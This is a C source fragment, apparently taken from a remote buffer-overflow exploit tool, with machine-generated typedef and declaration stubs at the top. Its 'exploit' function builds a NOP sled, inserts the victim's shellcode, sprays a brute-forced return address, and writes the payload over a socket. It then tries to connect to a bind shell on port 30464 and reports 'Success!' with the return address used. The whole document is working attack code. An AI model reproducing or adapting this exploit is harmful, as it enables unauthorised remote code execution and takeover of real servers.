
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct TYPE_4__ {int allign; long brutebase; int null_offset; int h; int shell; } ;
struct TYPE_3__ {int shell; } ;


 int MAXPATHLEN ;
 int fprintf (int ,char*,...) ;
 int memcpy (char*,int ,int) ;
 int memset (char*,char,int) ;
 int open_s (int ,int) ;
 int quit (int) ;
 int rand () ;
 TYPE_2__ rsx ;
 int stderr ;
 int strlen (int ) ;
 int usleep (int) ;
 TYPE_1__* victim ;
 scalar_t__ write (int,char*,int) ;

int
exploit(int s)
{

        char x_buf[MAXPATHLEN], b[4];
        int i;



        memset(x_buf, 0x90, ((MAXPATHLEN/2)-strlen(victim->shell)));
        memcpy(x_buf+((MAXPATHLEN/2)-strlen(victim->shell)), victim->shell, strlen(victim->shell));

        for(i=(MAXPATHLEN/2); i<((MAXPATHLEN/2)+rsx.allign);i++)
                x_buf[i] = 'x';
        for(i=((MAXPATHLEN/2)+rsx.allign); i<MAXPATHLEN; i+=4)
                *(long *)&x_buf[i] = rsx.brutebase;
        *(int *)&b[0] = (MAXPATHLEN-1);
        if(write(s, b, 4) < 0) return -1;
        if(write(s, x_buf, (MAXPATHLEN-1)) < 0) return -1;

        *(int *)&b[0] = rsx.null_offset;
        if(write(s, b, 4) < 0) return -1;

        memset(b, '\0', 4);
        if(write(s, b, 4) < 0) return -1;


        usleep(50000);


        fprintf(stderr, ";");
        if((rsx.shell = open_s(rsx.h, 30464)) < 0) {
                if(rand() % 2)
                        fprintf(stderr, "P");
                else
                        fprintf(stderr, "p");
                quit(s);
                return -1;
        }

        fprintf(stderr, "\n\nSuccess! (ret: %08x offset: %d)\n\n", (int)rsx.brutebase, rsx.null_offset);
        return 1;
}
